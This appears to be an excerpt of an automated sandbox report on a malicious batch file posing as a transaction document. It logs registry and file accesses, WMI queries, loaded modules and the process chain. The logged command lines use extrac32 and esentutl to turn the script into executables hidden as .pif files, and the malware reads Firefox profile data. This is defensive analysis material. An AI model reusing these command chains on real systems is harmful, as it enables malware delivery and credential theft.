                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCommand line argument: 08A11_2_00413780
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifCommand line argument: 08A11_1_00413780
                  Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: z1Transaction_ID_REF2418_cmd.batReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o
                  Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: unknownProcess created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                  Source: unknownProcess created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /oJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pifJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pifJump to behavior
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFProcess created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
